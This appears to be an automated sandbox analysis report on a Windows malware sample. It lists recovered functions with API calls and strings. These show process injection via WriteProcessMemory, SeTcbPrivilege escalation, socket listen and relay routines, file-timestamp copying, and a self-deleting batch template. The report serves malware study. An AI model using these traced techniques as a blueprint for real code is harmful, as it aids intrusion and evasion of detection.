Function 00C2869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,00C337D4,00000000,?), ref: 00C33756

Part of subcall function 00C36B09: memcmp.MSVCRT ref: 00C36B29

GetCurrentThread.KERNEL32 ref: 00C336AC
GetThreadPriority.KERNEL32 ref: 00C336B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00C336C6
Sleep.KERNEL32(00000000), ref: 00C336CA
memcpy.MSVCRT ref: 00C336D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00C336EA
SetThreadPriority.KERNEL32 ref: 00C336F2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GetTickCount.KERNEL32 ref: 00C3370D
GetTickCount.KERNEL32 ref: 00C3371A
Sleep.KERNEL32(00000000), ref: 00C33727

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2BFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 00C45C6B: memset.MSVCRT ref: 00C45C7A
Part of subcall function 00C45C6B: memcpy.MSVCRT ref: 00C45CA1

Part of subcall function 00C50741: CoInitializeEx.OLE32(00000000,00000000), ref: 00C5074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00C2C08A
GetHandleInformation.KERNEL32(?,?), ref: 00C2C09C

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(Function_00043510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(Function_00043510,?,00000000), ref: 00C5278F

socket.WS2_32(?,00000001,00000006), ref: 00C2C0CF
socket.WS2_32(?,00000002,00000011), ref: 00C2C0E0
closesocket.WS2_32(00000002), ref: 00C2C0FF
closesocket.WS2_32 ref: 00C2C106

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memset.MSVCRT ref: 00C2C1C8

Part of subcall function 00C52BF3: bind.WS2_32(?,00C52CD1), ref: 00C52C3A
Part of subcall function 00C52BF3: listen.WS2_32(?,00000014), ref: 00C52C4F
Part of subcall function 00C52BF3: WSAGetLastError.WS2_32(00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C5D
Part of subcall function 00C52BF3: WSASetLastError.WS2_32(?,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C6D

Part of subcall function 00C52C7A: memset.MSVCRT ref: 00C52C90
Part of subcall function 00C52C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 00C52CD5

Part of subcall function 00C52AB4: memset.MSVCRT ref: 00C52AC9
Part of subcall function 00C52AB4: getsockname.WS2_32(?,00C2C22C,?), ref: 00C52ADC

Part of subcall function 00C2C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C2C404

memcpy.MSVCRT ref: 00C2C3C8

Part of subcall function 00C4BF3B: CoUninitialize.OLE32 ref: 00C5078C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C508D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 00C50909
getsockname.WS2_32(?,?,?), ref: 00C50926
memcpy.MSVCRT ref: 00C50949
memcpy.MSVCRT ref: 00C50956
memcpy.MSVCRT ref: 00C50976
memcpy.MSVCRT ref: 00C50983
memset.MSVCRT ref: 00C50993
memcpy.MSVCRT ref: 00C509E3

Part of subcall function 00C36BFF: send.WS2_32(?,?,00000015,00000000), ref: 00C36C07

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 00C4439E
PathRemoveBackslashW.SHLWAPI ref: 00C443A8
memcpy.MSVCRT ref: 00C443F1
memcpy.MSVCRT ref: 00C4441E
PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(00F421E4,00F421D8,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C35BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,00C3E48F,00000000,00000000,00000002), ref: 00C35C16
GetLastError.KERNEL32(?,000000FF,00C3E48F,00000000,00000000,00000002,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001), ref: 00C35C20
TerminateThread.KERNEL32 ref: 00C35C28
CloseHandle.KERNEL32 ref: 00C35C2F

Part of subcall function 00C369C9: HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3
Part of subcall function 00C369C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35C44
ResumeThread.KERNEL32 ref: 00C35C5D

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 00C2E775
memcpy.MSVCRT ref: 00C2E78A
memcpy.MSVCRT ref: 00C2E79F
memcpy.MSVCRT ref: 00C2E7AE

Part of subcall function 00C2E301: EnterCriticalSection.KERNEL32(00C63510,?,00C2E5BF,?,00C2E617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 00C2E311
Part of subcall function 00C2E301: LeaveCriticalSection.KERNEL32(00C63510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,00C3BE0B,?,?,00000830), ref: 00C2E340

Part of subcall function 00C3DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
Part of subcall function 00C3DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
Part of subcall function 00C3DEBB: SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

SetFileTime.KERNEL32(?,?,?,?), ref: 00C2E813

Strings

SetFileInformationByHandle, xrefs: 00C2E7BD
kernel32.dll, xrefs: 00C2E7C2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351D86B, Relevance: 14.5, APIs: 3, Strings: 4, Instructions: 148

APIs

GetModuleFileNameW.KERNEL32(00000000,0355A8D1,00000104), ref: 0351D907

Part of subcall function 0351EEC8: GetCurrentProcess.KERNEL32 ref: 0351EEDE
Part of subcall function 0351EEC8: TerminateProcess.KERNEL32 ref: 0351EEE5

Part of subcall function 0351F2F7: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0351F332
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,MessageBoxW), ref: 0351F34E
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,MessageBoxW), ref: 0351F35F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetActiveWindow), ref: 0351F36C
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F36F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetLastActivePopup), ref: 0351F37C
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F37F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetUserObjectInformationW), ref: 0351F38C
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F38F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetProcessWindowStation), ref: 0351F3A0
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetProcessWindowStation,?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F3A3
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3C5
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3CF
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F40E
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(?), ref: 0351F428
Part of subcall function 0351F2F7: DecodePointer.KERNEL32(0355A89F,00000314), ref: 0351F43C

GetStdHandle.KERNEL32(000000F4), ref: 0351D9B9
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0351DA05

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Strings

Runtime Error!Program: , xrefs: 0351D8D5
<program name unknown>, xrefs: 0351D916
..., xrefs: 0351D957
Microsoft Visual C++ Runtime Library, xrefs: 0351D99D

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C2E5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 00C2E632
memcpy.MSVCRT ref: 00C2E645
memcpy.MSVCRT ref: 00C2E658
memcpy.MSVCRT ref: 00C2E663
GetFileTime.KERNEL32(?,?,?), ref: 00C2E687
memcpy.MSVCRT ref: 00C2E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C2E5F8

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(Function_00043510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4305A
LeaveCriticalSection.KERNEL32(Function_00043510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C43084

Part of subcall function 00C41215: memset.MSVCRT ref: 00C4122B
Part of subcall function 00C41215: InitializeCriticalSection.KERNEL32(00C62910), ref: 00C4123B
Part of subcall function 00C41215: memset.MSVCRT ref: 00C4126A
Part of subcall function 00C41215: InitializeCriticalSection.KERNEL32(00C628F0), ref: 00C41274

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C53DAE: memcpy.MSVCRT ref: 00C53DE4

memcmp.MSVCRT ref: 00C43175
memcmp.MSVCRT ref: 00C431A6

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

EnterCriticalSection.KERNEL32(00C62910), ref: 00C43219

Part of subcall function 00C4130C: GetTickCount.KERNEL32 ref: 00C41313

Part of subcall function 00C41723: EnterCriticalSection.KERNEL32(00C628F0,00C6292C,?,?,00C62910), ref: 00C41736
Part of subcall function 00C41723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C417E1
Part of subcall function 00C41723: LeaveCriticalSection.KERNEL32(00C628F0,?,?,00C62910), ref: 00C418CB

Part of subcall function 00C4198D: EnterCriticalSection.KERNEL32(00000000,?,?,?,?,00C62910), ref: 00C41A67
Part of subcall function 00C4198D: LeaveCriticalSection.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00C62910), ref: 00C41A8F

LeaveCriticalSection.KERNEL32(00C62910,00C6292C,00C6292C,00C6292C), ref: 00C43269

Part of subcall function 00C45FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,00C6292C,?,?,00C62910,?,?,?,?,00C43260,00C6292C), ref: 00C45FD6

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

!, xrefs: 00C43187
!, xrefs: 00C431AF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C448F2, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 00C44932

Part of subcall function 00C31791: InitializeCriticalSection.KERNEL32(00C63510), ref: 00C317B1
Part of subcall function 00C31791: InitializeCriticalSection.KERNEL32 ref: 00C317C6
Part of subcall function 00C31791: memset.MSVCRT ref: 00C317DB
Part of subcall function 00C31791: TlsAlloc.KERNEL32(?,00000000,00C44986,?,?,00000001), ref: 00C317F2
Part of subcall function 00C31791: GetModuleHandleW.KERNEL32(?), ref: 00C31817

WSAStartup.WS2_32(00000202,?), ref: 00C44998
CreateEventW.KERNEL32(00C62974,00000001), ref: 00C449BA

Part of subcall function 00C3500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00C35020
Part of subcall function 00C3500E: GetTokenInformation.ADVAPI32(?,0000000C,00C62968,00000004,?), ref: 00C35048
Part of subcall function 00C3500E: CloseHandle.KERNEL32(?), ref: 00C3505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00C449EC

Part of subcall function 00C446CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C4470E

GetCurrentProcessId.KERNEL32 ref: 00C44A17

Part of subcall function 00C4472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00C44777
Part of subcall function 00C4472D: lstrcmpiW.KERNEL32(?,?), ref: 00C447A6

Part of subcall function 00C447E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C44819
Part of subcall function 00C447E5: lstrcatW.KERNEL32(?,.dat), ref: 00C44879
Part of subcall function 00C447E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C4489E
Part of subcall function 00C447E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00C448BB
Part of subcall function 00C447E5: CloseHandle.KERNEL32 ref: 00C448C8

Part of subcall function 00C440F3: IsBadReadPtr.KERNEL32 ref: 00C4412C

Strings

GetProcAddress, xrefs: 00C44941
LoadLibraryA, xrefs: 00C4494D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 00C39657
GetProcAddress.KERNEL32(?,?), ref: 00C39685
GetProcAddress.KERNEL32(?,?), ref: 00C3969F
GetProcAddress.KERNEL32(?,?), ref: 00C396BB
FreeLibrary.KERNEL32 ref: 00C39769

Part of subcall function 00C350C0: GetCurrentThread.KERNEL32 ref: 00C350D4
Part of subcall function 00C350C0: OpenThreadToken.ADVAPI32 ref: 00C350DB
Part of subcall function 00C350C0: GetCurrentProcess.KERNEL32 ref: 00C350EB
Part of subcall function 00C350C0: OpenProcessToken.ADVAPI32 ref: 00C350F2
Part of subcall function 00C350C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00C35113
Part of subcall function 00C350C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00C35128
Part of subcall function 00C350C0: GetLastError.KERNEL32 ref: 00C35132
Part of subcall function 00C350C0: CloseHandle.KERNEL32(00000001), ref: 00C35143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00C396E8

Part of subcall function 00C395BE: EqualSid.ADVAPI32(?,5B867A00), ref: 00C395E1
Part of subcall function 00C395BE: CloseHandle.KERNEL32(00000001), ref: 00C39628

Strings

SeTcbPrivilege, xrefs: 00C396DE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C447E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C44819

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

lstrcatW.KERNEL32(?,.dat), ref: 00C44879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C4489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00C448BB
CloseHandle.KERNEL32 ref: 00C448C8

Part of subcall function 00C31905: EnterCriticalSection.KERNEL32(00F41E90,00000000,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31913
Part of subcall function 00C31905: GetFileVersionInfoSizeW.VERSION(00F41EF0,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31933
Part of subcall function 00C31905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31953
Part of subcall function 00C31905: LeaveCriticalSection.KERNEL32(00F41E90,?,?,?,?,00C448EB,?,?,00000000), ref: 00C319D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C4483A
.dat, xrefs: 00C4486D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(?), ref: 00C36F50
FlushFileBuffers.KERNEL32 ref: 00C37036

Part of subcall function 00C444FB: FindFirstFileW.KERNEL32(?,?), ref: 00C4452C
Part of subcall function 00C444FB: FindNextFileW.KERNEL32(?,?), ref: 00C4457E
Part of subcall function 00C444FB: FindClose.KERNEL32 ref: 00C44589
Part of subcall function 00C444FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C44595
Part of subcall function 00C444FB: RemoveDirectoryW.KERNEL32(?), ref: 00C4459C

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

PathRemoveFileSpecW.SHLWAPI(?), ref: 00C36F85

Part of subcall function 00C2E35B: GetTempPathW.KERNEL32(00000104,?), ref: 00C2E376
Part of subcall function 00C2E35B: PathAddBackslashW.SHLWAPI(?), ref: 00C2E3A0
Part of subcall function 00C2E35B: CreateDirectoryW.KERNEL32(?), ref: 00C2E457
Part of subcall function 00C2E35B: SetFileAttributesW.KERNEL32(?), ref: 00C2E468
Part of subcall function 00C2E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00C2E481
Part of subcall function 00C2E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00C2E492

MoveFileExW.KERNEL32(?,?,00000001), ref: 00C36FCC
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C36FE5

Part of subcall function 00C2E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E594

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Sleep.KERNEL32(00001388), ref: 00C37028

Strings

.tmp, xrefs: 00C36F9C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(00C62980,00000001), ref: 00C5359E
SetSecurityDescriptorDacl.ADVAPI32(00C62980,00000001,00000000,00000000), ref: 00C535AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00C535C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00C535E1
SetSecurityDescriptorSacl.ADVAPI32(00C62980,?,00000001,?), ref: 00C535F5
LocalFree.KERNEL32(?), ref: 00C53607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00C535C0

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C41051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(Function_00043510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C41067
LeaveCriticalSection.KERNEL32(Function_00043510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C4108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00C410AB
GetProcAddress.KERNEL32 ref: 00C410B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 00C410D4

Strings

RegDeleteKeyExW, xrefs: 00C410A1
advapi32.dll, xrefs: 00C410A6

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C540CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00C540DC

Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44A89
Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44AC4
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B04
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B27
Part of subcall function 00C44A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C44B77

CreateThread.KERNEL32(00000000,00000000,00C540AB,?), ref: 00C54132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5413D
CloseHandle.KERNEL32 ref: 00C54144
WaitForSingleObject.KERNEL32(?,00002710), ref: 00C54154
CloseHandle.KERNEL32(?), ref: 00C5415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C5416C
CloseHandle.KERNEL32 ref: 00C54173

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351FFBF, Relevance: 14.2, APIs: 8, Instructions: 58

APIs

InterlockedIncrement.KERNEL32(?,00000001,?), ref: 0351FFD1
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFDE
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFEB
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFF8
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520005
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520021
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520031
InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520047

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C51474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 00C52A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 00C52A47

Part of subcall function 00C36B66: select.WS2_32(00000000,?,00000000,00000000), ref: 00C36BC5
Part of subcall function 00C36B66: recv.WS2_32(?,?,?,00000000), ref: 00C36BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00C5154F
memcpy.MSVCRT ref: 00C51587
FreeAddrInfoW.WS2_32(?), ref: 00C51595
memset.MSVCRT ref: 00C515B0

Part of subcall function 00C513F4: getpeername.WS2_32(?,?,?), ref: 00C51418
Part of subcall function 00C513F4: getsockname.WS2_32(?,?,?), ref: 00C51430
Part of subcall function 00C513F4: send.WS2_32(00000000,?,00000008,00000000), ref: 00C51461

Part of subcall function 00C36D02: socket.WS2_32(?,00000001,00000006), ref: 00C36D0E
Part of subcall function 00C36D02: bind.WS2_32 ref: 00C36D2B
Part of subcall function 00C36D02: listen.WS2_32(?,00000001), ref: 00C36D38
Part of subcall function 00C36D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D42
Part of subcall function 00C36D02: closesocket.WS2_32 ref: 00C36D4B
Part of subcall function 00C36D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D52

Part of subcall function 00C36EB5: accept.WS2_32(?,00000000,?), ref: 00C36ED6

Part of subcall function 00C36C17: socket.WS2_32(?,00000001,00000006), ref: 00C36C23
Part of subcall function 00C36C17: connect.WS2_32 ref: 00C36C40
Part of subcall function 00C36C17: closesocket.WS2_32 ref: 00C36C4B

Part of subcall function 00C5304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00C53061

Part of subcall function 00C36D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36D88
Part of subcall function 00C36D60: recv.WS2_32(?,?,00000400,00000000), ref: 00C36DB4
Part of subcall function 00C36D60: send.WS2_32(?,?,?,00000000), ref: 00C36DD6
Part of subcall function 00C36D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36E03

Part of subcall function 00C36EE0: shutdown.WS2_32(?,00000002), ref: 00C36EEB
Part of subcall function 00C36EE0: closesocket.WS2_32 ref: 00C36EF2

Strings

[, xrefs: 00C515CD
[, xrefs: 00C51609
[, xrefs: 00C516E7
Z, xrefs: 00C51700

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C33D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 00C33D5E
EnterCriticalSection.KERNEL32 ref: 00C33D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00C33DB8
GetTickCount.KERNEL32 ref: 00C33DCB

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C2CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C2CEB9

GetTickCount.KERNEL32 ref: 00C33FC5

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CD70
Part of subcall function 00C2CD5A: memcpy.MSVCRT ref: 00C2CDCD
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1,?,00000002), ref: 00C2CDDD
Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00C2CE11
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CE9F

Part of subcall function 00C33906: memset.MSVCRT ref: 00C339D5
Part of subcall function 00C33906: memcpy.MSVCRT ref: 00C33A30
Part of subcall function 00C33906: memcmp.MSVCRT ref: 00C33AAB
Part of subcall function 00C33906: memcpy.MSVCRT ref: 00C33AFF
Part of subcall function 00C33906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BD2
Part of subcall function 00C33906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BF0

GetTickCount.KERNEL32 ref: 00C33FFE
